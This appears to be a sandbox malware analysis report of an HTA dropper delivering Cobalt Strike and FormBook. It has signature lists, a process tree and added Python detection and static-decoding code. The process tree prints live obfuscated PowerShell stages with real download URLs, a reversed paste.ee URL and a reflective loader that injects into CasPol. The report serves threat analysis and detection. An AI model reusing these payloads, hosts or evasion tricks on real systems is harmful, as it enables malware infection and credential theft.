Windows Analysis Report
goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta
Overview
General Information
Detection
Cobalt Strike, FormBook
Score | Range | Whitelisted | Confidence |
---|---|---|---|
100 | 0 - 100 | false | 100% |
Signatures
Antivirus detection for URL or domain
Detected Cobalt Strike Beacon
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected obfuscated html page
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
PowerShell case anomaly found
Queues an APC in another process (thread injection)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
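Several of the signatures above (PowerShell case anomaly, Base64 Encoded PowerShell Command, Suspicious MSHTA Child Process, WScript or CScript Dropper, Very long command line) rest on command-line heuristics. The following is an added example, not Joe Sandbox's or the Sigma rules' own logic: simplified re-implementations of those checks in Python, run over a process list constructed from this report's process tree. The parent links follow the Sigma hits (mshta.exe spawning cmd.exe, wscript.exe spawning powershell.exe), the stage-1 base64 argument is elided, and the two `-EncodedCommand` entries at the end are invented to exercise the hidden-keyword check, which looks for the base64 spelling of `FromBase64String` at each of the three 3-byte alignments rather than decoding anything.

```python
"""Simplified re-implementations of the command-line checks behind several signatures above (PowerShell
case anomaly, '::' assembled from [char] values, FromBase64String hidden inside a base64 blob, a scripting
host spawning a shell). Added example; this is not Joe Sandbox's or the Sigma rules' own logic."""
import base64
import re
from dataclasses import dataclass
from typing import Optional

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


@dataclass
class Proc:
    name: str
    parent: Optional[str]
    cmdline: str


def case_transitions(token: str) -> int:
    """Lower/upper switches between adjacent letters; a leading capital is normal and ignored."""
    letters = token[1:] if token[0].isupper() else token
    return sum(1 for a, b in zip(letters, letters[1:]) if a.isupper() != b.isupper())


def case_anomalies(cmdline: str, threshold: int = 3) -> list:
    """Words such as 'POwersheLl' that flip case more often than any real cmdlet, flag or path does.
    Long base64 runs flip case at random, so they are blanked first and handled by hidden_keyword()."""
    plain = B64_RUN.sub(" ", cmdline)
    return [t for t in re.findall(r"[A-Za-z]{4,}", plain) if case_transitions(t) >= threshold]


def builds_scope_operator(cmdline: str) -> bool:
    """'::' assembled as [char]58+[char]0x3a so that 'Convert]::FromBase64String' never appears literally."""
    return re.search(r"\[char\]\s*(?:58|0x3a)\s*\+\s*\[char\]\s*(?:58|0x3a)", cmdline, re.I) is not None


def b64_variants(keyword: str, encoding: str) -> list:
    """The three base64 spellings of keyword (one per 3-byte alignment), cut down to the characters that
    depend only on the keyword bytes, so any of them can be matched inside a larger base64 blob."""
    raw = keyword.encode(encoding)
    out = []
    for pad in range(3):
        enc = base64.b64encode(b"\x00" * pad + raw).decode()
        out.append(enc[4 : 4 * ((pad + len(raw)) // 3)])  # drop the first group and any partial last one
    return out


def hidden_keyword(blob: str, keyword: str = "FromBase64String") -> Optional[str]:
    """The text encoding under which keyword occurs inside the base64 blob, or None."""
    for encoding in ("utf-16-le", "utf-8"):  # -EncodedCommand is UTF-16LE; this sample's stages are UTF-8
        if any(v in blob for v in b64_variants(keyword, encoding)):
            return encoding
    return None


def triage(procs: list) -> list:
    """Run every check over a process list and return one line per finding."""
    findings = []
    for p in procs:
        if p.parent in SCRIPT_HOSTS and p.name in SHELLS:
            findings.append(f"{p.name}: spawned by scripting host {p.parent}")
        words = case_anomalies(p.cmdline)
        if words:
            findings.append(f"{p.name}: case anomaly in {words}")
        if builds_scope_operator(p.cmdline):
            findings.append(f"{p.name}: '::' assembled from [char] values")
        for blob in B64_RUN.findall(p.cmdline):
            enc = hidden_keyword(blob)
            if enc:
                findings.append(f"{p.name}: FromBase64String hidden in base64 ({enc})")
        if len(p.cmdline) > 1000:
            findings.append(f"{p.name}: very long command line ({len(p.cmdline)} chars)")
    return findings


# Constructed sample. The first three entries follow this report's process tree (parent links as the Sigma
# hits state them; the stage-1 base64 argument is elided as '...'). The last two are invented
# -EncodedCommand lines, one carrying FromBase64String and one benign, to exercise hidden_keyword().
ENC = base64.b64encode("IEX([System.Convert]::FromBase64String($x))".encode("utf-16-le")).decode()
BENIGN_ENC = base64.b64encode("Write-Host hello".encode("utf-16-le")).decode()
SAMPLE = [
    Proc("mshta.exe", None, 'mshta.exe "C:\\Users\\user\\Desktop\\goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta"'),
    Proc("cmd.exe", "mshta.exe",
         '"C:\\Windows\\system32\\cmd.exe" "/c POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; '
         "iNVOke-expRESSiON($(iNvOkE-ExpRESSioN('[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'"
         "+[Char]58+[ChAR]0X3A+'FRombASe64STRIng('+[chAR]0X22+'...'+[ChAr]0X22+'))')))\""),
    Proc("firefox.exe", None, '"C:\\Program Files\\Mozilla Firefox\\Firefox.exe"'),
    Proc("powershell.exe", "wscript.exe", f"powershell.exe -nop -w hidden -enc {ENC}"),
    Proc("powershell.exe", "explorer.exe", f"powershell.exe -enc {BENIGN_ENC}"),
]

if __name__ == "__main__":
    print("\n".join(triage(SAMPLE)))
```

Running it prints one line per finding for cmd.exe (scripting-host parent, case anomalies, `::` built from `[char]`) and for the injected `-enc` entry (scripting-host parent, hidden `FromBase64String`), and nothing for firefox.exe or the benign encoded command. The alignment trick in `b64_variants()` is the reason Sigma rules of this kind carry three base64 strings per keyword instead of one.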
Classification
- System is w10x64
- mshta.exe (PID: 1088 cmdline: mshta.exe "C:\Users\user\Desktop\goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
- cmd.exe (PID: 6036 cmdline: "C:\Windows\system32\cmd.exe" "/c POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; iNVOke-expRESSiON($(iNvOkE-ExpRESSioN('[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'+[Char]58+[ChAR]0X3A+'FRombASe64STRIng('+[chAR]0X22+'JEw0ZndkeXlMajAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVGSU5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRvUEFva1FsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRFBqS3BBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZ0JoTVZaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFNFSkFZa3BHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5eXVaQ0FMWVkpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkVSaUlMZk4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTDRmd2R5eUxqMDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNDQuMTc1LzczL3NpbXBsZWNvb2tpZWJpc2N1dHdpdGhzd2VldG5lc3Nmb3JlbnRpcmV0aW1lLnRJRiIsIiRlTnY6QVBQREFUQVxzaW1wbGVjb29raWViaXNjdXR3aXRoc3dlZXRuZXNzZm9yZW50aXIudmJTIiwwLDApO3NUQXJULVNsZUVwKDMpO0lOdk9rZS1FWFBSZXNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2ltcGxlY29va2llYmlzY3V0d2l0aHN3ZWV0bmVzc2ZvcmVudGlyLnZiUyI='+[ChAr]0X22+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 2172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 5144 cmdline: POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; iNVOke-expRESSiON($(iNvOkE-ExpRESSioN('[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'+[Char]58+[ChAR]0X3A+'FRombASe64STRIng('+[chAR]0X22+'JEw0ZndkeXlMajAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVGSU5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRvUEFva1FsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRFBqS3BBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZ0JoTVZaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFNFSkFZa3BHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5eXVaQ0FMWVkpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkVSaUlMZk4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTDRmd2R5eUxqMDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNDQuMTc1LzczL3NpbXBsZWNvb2tpZWJpc2N1dHdpdGhzd2VldG5lc3Nmb3JlbnRpcmV0aW1lLnRJRiIsIiRlTnY6QVBQREFUQVxzaW1wbGVjb29raWViaXNjdXR3aXRoc3dlZXRuZXNzZm9yZW50aXIudmJTIiwwLDApO3NUQXJULVNsZUVwKDMpO0lOdk9rZS1FWFBSZXNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2ltcGxlY29va2llYmlzY3V0d2l0aHN3ZWV0bmVzc2ZvcmVudGlyLnZiUyI='+[ChAr]0X22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- csc.exe (PID: 4796 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j4tmsurx\j4tmsurx.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
- cvtres.exe (PID: 1372 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC568.tmp" "c:\Users\user\AppData\Local\Temp\j4tmsurx\CSCD8A49667F2D248CBA423D29C56F4A9D.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
- wscript.exe (PID: 6552 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplecookiebiscutwithsweetnessforentir.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
- powershell.exe (PID: 1096 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $claustrophobe = 'JGF1dG9zYXZlID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGNoZW1vdHJvcGlzbSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHF1ZWVmID0gJGNoZW1vdHJvcGlzbS5Eb3dubG9hZERhdGEoJGF1dG9zYXZlKTskcHVua2xpbmcgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcXVlZWYpOyR0dWJlcmN1bG9waG9iaWEgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGZlbXRvY291bG9tYiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHVudGhyaWZ0eSA9ICRwdW5rbGluZy5JbmRleE9mKCR0dWJlcmN1bG9waG9iaWEpOyRoYW1tYW0gPSAkcHVua2xpbmcuSW5kZXhPZigkZmVtdG9jb3Vsb21iKTskdW50aHJpZnR5IC1nZSAwIC1hbmQgJGhhbW1hbSAtZ3QgJHVudGhyaWZ0eTskdW50aHJpZnR5ICs9ICR0dWJlcmN1bG9waG9iaWEuTGVuZ3RoOyRwZXRyb2RvbGxhciA9ICRoYW1tYW0gLSAkdW50aHJpZnR5OyRkYXN5YXRpZGFlID0gJHB1bmtsaW5nLlN1YnN0cmluZygkdW50aHJpZnR5LCAkcGV0cm9kb2xsYXIpOyRkaWdpdGFsaXNpbmcgPSAtam9pbiAoJGRhc3lhdGlkYWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGRhc3lhdGlkYWUuTGVuZ3RoKV07JHVuaWRlYWxpemVkID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZGlnaXRhbGlzaW5nKTskY29tbWVuZGluZyA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJHVuaWRlYWxpemVkKTskamFwb25pY2FzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGphcG9uaWNhcy5JbnZva2UoJG51bGwsIEAoJzAvY3VWREUvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRjb25maWRlbnRpYWxpdHknLCAnJGNvbmZpZGVudGlhbGl0eScsICckY29uZmlkZW50aWFsaXR5JywgJ0Nhc1BvbCcsICckY29uZmlkZW50aWFsaXR5JywgJyRjb25maWRlbnRpYWxpdHknLCckY29uZmlkZW50aWFsaXR5JywnJGNvbmZpZGVudGlhbGl0eScsJyRjb25maWRlbnRpYWxpdHknLCckY29uZmlkZW50aWFsaXR5JywnJGNvbmZpZGVudGlhbGl0eScsJzEnLCckY29uZmlkZW50aWFsaXR5JykpOw==';$uninverted = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($claustrophobe));Invoke-Expression $uninverted MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 2924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- CasPol.exe (PID: 6780 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
- xwZkSdnVCDBnu.exe (PID: 3948 cmdline: "C:\Program Files (x86)\NTWdPgzKzLbuxCjTrDXjuyVYGnrROhiyAyBoUSHnPMBJRdrxUUFzxHrHbzfXIHvRb\xwZkSdnVCDBnu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
- ieUnatt.exe (PID: 1276 cmdline: "C:\Windows\SysWOW64\ieUnatt.exe" MD5: 4E9919DF2EF531B389ABAEFD35AD546E)
- xwZkSdnVCDBnu.exe (PID: 6160 cmdline: "C:\Program Files (x86)\NTWdPgzKzLbuxCjTrDXjuyVYGnrROhiyAyBoUSHnPMBJRdrxUUFzxHrHbzfXIHvRb\xwZkSdnVCDBnu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
- firefox.exe (PID: 5252 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
- cleanup
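The two PowerShell stages in this tree can be unwrapped statically. The decoder below is an added example, not part of the report and not the malware's own code; it embeds the two base64 arguments exactly as the report renders them (the rendering inserts a space after every tenth character, which the code strips), resolves the `[char]58+[char]0x3a` trick that hides `::` and the `[char]0x22` that hides the quotes, decodes both payloads and pulls the indicators out without executing anything. Decoded, stage 1 is an Add-Type P/Invoke declaration of `URLDownloadToFile` from URLMON.dll that fetches http://107.172.44.175/73/simplecookiebiscutwithsweetnessforentiretime.tIF to `$env:APPDATA\simplecookiebiscutwithsweetnessforentir.vbS`, sleeps three seconds and invokes that file, which is the wscript.exe entry in the tree. Stage 2 downloads https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg, cuts the text between `<<BASE64_START>>` and `<<BASE64_END>>`, reverses and base64-decodes it, loads the result with `[System.Reflection.Assembly]::Load`, and calls `dnlib.IO.Home.VAI` with a string that is the paste.ee URL https://paste.ee/r/EDVuc/0 written backwards (the pastebin connection in the signatures) and the process name `CasPol`, which matches the CasPol.exe that appears next in the tree.

```python
"""Static decoder for the two PowerShell stages in the process tree above: added example, not part of the
report. It only undoes the string tricks and never executes anything."""
import base64
import re

# Stage-1 payload (the FromBase64String argument in the cmd.exe / powershell.exe command lines) and stage-2
# payload ($claustrophobe in the later powershell.exe), copied from the report, whose rendering inserts a
# space after every 10th character; re.sub() strips those.
STAGE1_B64 = re.sub(r"\s+", "", """
JEw0Z ndkeXlMajA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgPSAgI CAgICAgICA gICAgICAgI CAgICAgICA
gICAgICAgI CBhRGQtVHl wZSAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAtT UVNYkVSZEV GSU5JVGlPb iAgICAgICA
gICAgICAgI CAgICAgICA gICAgICAgI CAgICAnW0R sbEltcG9yd CgiVVJsTU9 OLmRMTCIsI CAgICAgICA gICAgICAgI CAgICAgICA
gICAgICAgI CAgIENoYXJ TZXQgPSBDa GFyU2V0LlV uaWNvZGUpX XB1YmxpYyB zdGF0aWMgZ Xh0ZXJuIEl udFB0ciBVU kxEb3dubG9
hZFRvRmlsZ ShJbnRQdHI gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgWFRvU EFva1FsLHN 0cmluZyAgI CAgICAgICA
gICAgICAgI CAgICAgICA gICAgICAgI CBtRFBqS3B BLHN0cmluZ yAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBYZ0J
oTVZaLHVpb nQgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgZFN FSkFZa3BHL EludFB0ciA gICAgICAgI CAgICAgICA
gICAgICAgI CAgICAgICA gICB5eXVaQ 0FMWVkpOyc gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgLW5hT WUgICAgICA
gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIkV SaUlMZk4iI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIC1uQU1
lc1BhQ2UgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgQXogICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA
gLVBhc3NUa HJ1OyAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA kTDRmd2R5e UxqMDo6VVJ MRG93bmxvY WRUb0ZpbGU
oMCwiaHR0c DovLzEwNy4 xNzIuNDQuM Tc1LzczL3N pbXBsZWNvb 2tpZWJpc2N 1dHdpdGhzd 2VldG5lc3N mb3JlbnRpc mV0aW1lLnR
JRiIsIiRlT nY6QVBQREF UQVxzaW1wb GVjb29raWV iaXNjdXR3a XRoc3dlZXR uZXNzZm9yZ W50aXIudmJ TIiwwLDApO 3NUQXJULVN
sZUVwKDMpO 0lOdk9rZS1 FWFBSZXNza W9OICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICI kZU5WOkFQU ERBVEFcc2l
tcGxlY29va 2llYmlzY3V 0d2l0aHN3Z WV0bmVzc2Z vcmVudGlyL nZiUyI=
""")
STAGE2_B64 = re.sub(r"\s+", "", """
JG F1dG9zYXZl ID0gJ2h0dH BzOi8vcmVz LmNsb3VkaW 5hcnkuY29t L2R5dGZsdD Yxbi9pbWFn ZS91cGxvYW QvdjE3MzMx
MzQ5NDcvYm tscHlzZXll dXQ0aW1wdz UwbjEuanBn ICc7JGNoZW 1vdHJvcGlz bSA9IE5ldy 1PYmplY3Qg U3lzdGVtLk 5ldC5XZWJD
bGllbnQ7JH F1ZWVmID0g JGNoZW1vdH JvcGlzbS5E b3dubG9hZE RhdGEoJGF1 dG9zYXZlKT skcHVua2xp bmcgPSBbU3 lzdGVtLlRl
eHQuRW5jb2 RpbmddOjpV VEY4LkdldF N0cmluZygk cXVlZWYpOy R0dWJlcmN1 bG9waG9iaW EgPSAnPDxC QVNFNjRfU1 RBUlQ+Pic7
JGZlbXRvY2 91bG9tYiA9 ICc8PEJBU0 U2NF9FTkQ+ Pic7JHVudG hyaWZ0eSA9 ICRwdW5rbG luZy5JbmRl eE9mKCR0dW JlcmN1bG9w
aG9iaWEpOy RoYW1tYW0g PSAkcHVua2 xpbmcuSW5k ZXhPZigkZm VtdG9jb3Vs b21iKTskdW 50aHJpZnR5 IC1nZSAwIC 1hbmQgJGhh
bW1hbSAtZ3 QgJHVudGhy aWZ0eTskdW 50aHJpZnR5 ICs9ICR0dW JlcmN1bG9w aG9iaWEuTG VuZ3RoOyRw ZXRyb2RvbG xhciA9ICRo
YW1tYW0gLS AkdW50aHJp ZnR5OyRkYX N5YXRpZGFl ID0gJHB1bm tsaW5nLlN1 YnN0cmluZy gkdW50aHJp ZnR5LCAkcG V0cm9kb2xs
YXIpOyRkaW dpdGFsaXNp bmcgPSAtam 9pbiAoJGRh c3lhdGlkYW UuVG9DaGFy QXJyYXkoKS B8IEZvckVh Y2gtT2JqZW N0IHsgJF8g
fSlbLTEuLi 0oJGRhc3lh dGlkYWUuTG VuZ3RoKV07 JHVuaWRlYW xpemVkID0g W1N5c3RlbS 5Db252ZXJ0 XTo6RnJvbU Jhc2U2NFN0
cmluZygkZG lnaXRhbGlz aW5nKTskY2 9tbWVuZGlu ZyA9IFtTeX N0ZW0uUmVm bGVjdGlvbi 5Bc3NlbWJs eV06OkxvYW QoJHVuaWRl
YWxpemVkKT skamFwb25p Y2FzID0gW2 RubGliLklP LkhvbWVdLk dldE1ldGhv ZCgnVkFJJy k7JGphcG9u aWNhcy5Jbn Zva2UoJG51
bGwsIEAoJz AvY3VWREUv ci9lZS5ldH NhcC8vOnNw dHRoJywgJy Rjb25maWRl bnRpYWxpdH knLCAnJGNv bmZpZGVudG lhbGl0eScs
ICckY29uZm lkZW50aWFs aXR5JywgJ0 Nhc1BvbCcs ICckY29uZm lkZW50aWFs aXR5JywgJy Rjb25maWRl bnRpYWxpdH knLCckY29u
ZmlkZW50aW FsaXR5Jywn JGNvbmZpZG VudGlhbGl0 eScsJyRjb2 5maWRlbnRp YWxpdHknLC ckY29uZmlk ZW50aWFsaX R5JywnJGNv
bmZpZGVudG lhbGl0eScs JzEnLCckY2 9uZmlkZW50 aWFsaXR5Jy kpOw==
""")
# The wrappers as the report shows them (stage-1 whitespace normalised to single spaces).
STAGE1_CMDLINE = (
    "POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; iNVOke-expRESSiON($(iNvOkE-ExpRESSioN("
    "'[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'+[Char]58+[ChAR]0X3A+"
    "'FRombASe64STRIng('+[chAR]0X22+'" + STAGE1_B64 + "'+[ChAr]0X22+'))')))\""
)
STAGE2_CMDLINE = ("$claustrophobe = '" + STAGE2_B64 + "';$uninverted = [System.Text.Encoding]::UTF8.GetString("
                  "[System.Convert]::FromBase64String($claustrophobe));Invoke-Expression $uninverted")


def fold_char_concat(src: str) -> str:
    """Turn [char]58 / [char]0x3a (any case) into the character and join 'a'+'b' fragments, so the '::' and
    '"' that the wrapper split out become readable again."""
    def literal(m):
        v = m.group(1)
        return "'" + chr(int(v, 16) if v.lower().startswith("0x") else int(v)) + "'"
    src = re.sub(r"\[char\]\s*(0x[0-9a-f]+|\d+)", literal, src, flags=re.I)
    return re.sub(r"'\s*\+\s*'", "", src)


def find_base64_text(src: str) -> list:
    """Every run of 40+ base64 characters in src that decodes to text."""
    out = []
    for m in re.finditer(r"[A-Za-z0-9+/]{40,}={0,2}", src):
        try:
            text = base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if all(c.isprintable() or c.isspace() for c in text):
            out.append(text)
    return out


def decode_stage(cmdline: str) -> str:
    """Fold the [char] tricks, take the single base64 payload and collapse its padding whitespace."""
    texts = find_base64_text(fold_char_concat(cmdline))
    if len(texts) != 1:
        raise ValueError(f"expected one base64 payload, found {len(texts)}")
    return re.sub(r"\s+", " ", texts[0]).strip()


def extract_iocs(script: str) -> dict:
    """Network and file indicators a triage analyst wants out of a decoded stage."""
    return {
        "urls": re.findall(r"https?://[^\s\"'<>]+", script),
        # this loader stores its next URL backwards and reverses it at run time with [-1..-(length)]
        "reversed_urls": [s[::-1] for s in re.findall(r"'([^']*//:s?ptth)'", script)],
        "paths": sorted(set(re.findall(r"\$env:[A-Za-z_]+\\[^\s\"']+", script, re.I))),
        "markers": re.findall(r"'(<<[A-Z0-9_]+>>)'", script),
        "reflection": re.findall(r"\[([\w.]+)\]\.GetMethod\('(\w+)'\)", script),
        "quoted_words": re.findall(r"'([A-Za-z][A-Za-z0-9]*)'", script),
    }


STAGE1_SCRIPT, STAGE2_SCRIPT = decode_stage(STAGE1_CMDLINE), decode_stage(STAGE2_CMDLINE)
STAGE1_IOCS, STAGE2_IOCS = extract_iocs(STAGE1_SCRIPT), extract_iocs(STAGE2_SCRIPT)
```

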